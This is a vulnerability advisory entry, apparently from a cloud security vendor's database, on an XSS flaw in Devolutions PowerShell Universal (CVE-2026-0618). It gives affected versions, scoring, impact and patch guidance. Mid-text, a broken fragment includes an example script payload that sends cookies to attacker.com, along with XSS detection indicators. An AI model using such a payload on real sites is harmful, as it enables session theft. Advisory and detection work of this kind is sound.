
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-0618 is a Cross-Site Scripting (XSS) vulnerability in Devolutions PowerShell Universal that allows network-based attackers to inject malicious scripts into web pages viewed by other users. It affects PowerShell Universal versions before 4.5.6 (4.x branch) and versions 5.0.0 through 5.6.12 (before 5.6.13 in the 5.x branch). The CVE was received from Devolutions Inc. on January 7, 2026, with initial NVD analysis completed on January 29, 2026. It carries a CVSS v3.1 base score of 6.1 (Medium), assessed by CISA-ADP (Devolutions Advisory, NVD).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), meaning the application fails to adequately sanitize or encode user-supplied input before rendering it in web pages. The attack vector is network-based, requires no privileges, but does require user interaction (e.g., a victim clicking a malicious link or visiting a crafted page). The changed scope indicator in the CVSS vector (S:C) indicates that the impact extends beyond the vulnerable component itself, potentially affecting other browser-accessible resources. No public proof-of-concept exploit code has been identified at this time (Devolutions Advisory, NVD).
Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the context of a victim user's browser session within the PowerShell Universal web interface. This can lead to theft of session tokens, session cookies, or other sensitive browser-accessible data, resulting in account compromise. The confidentiality and integrity impacts are rated low, and there is no direct availability impact; however, the changed scope means attacker-controlled scripts can affect resources beyond the vulnerable component itself (Devolutions Advisory, NVD).
There is no evidence of active in-the-wild exploitation or a publicly available proof-of-concept for CVE-2026-0618 at this time. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. A patch has been available since January 2026 (Devolutions Advisory, NVD).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) designed to exfiltrate session cookies or tokens.%3Cscript%3E, javascript:, onerror=) in input parameters; repeated access to PowerShell Universal pages from unfamiliar IP addresses.Devolutions has released patched versions addressing this vulnerability: upgrade to PowerShell Universal 4.5.6 or later for the 4.x branch, or 5.6.13 or later for the 5.x branch. As interim mitigations, administrators should implement a strict Content Security Policy (CSP) to limit script execution, deploy a Web Application Firewall (WAF) to detect and block XSS payloads, and educate users about phishing and suspicious links. Upgrading to a patched version is the recommended and definitive remediation (Devolutions Advisory).
Coverage of CVE-2026-0618 has been limited to automated vulnerability tracking platforms and aggregators such as VulnDB, CVEFeed, and Vulners, with no notable independent researcher commentary or significant media coverage identified. The vulnerability was briefly noted on social platforms including Bluesky via automated CVE tracking accounts. No major vendor statements beyond the Devolutions security advisory have been published (Devolutions Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."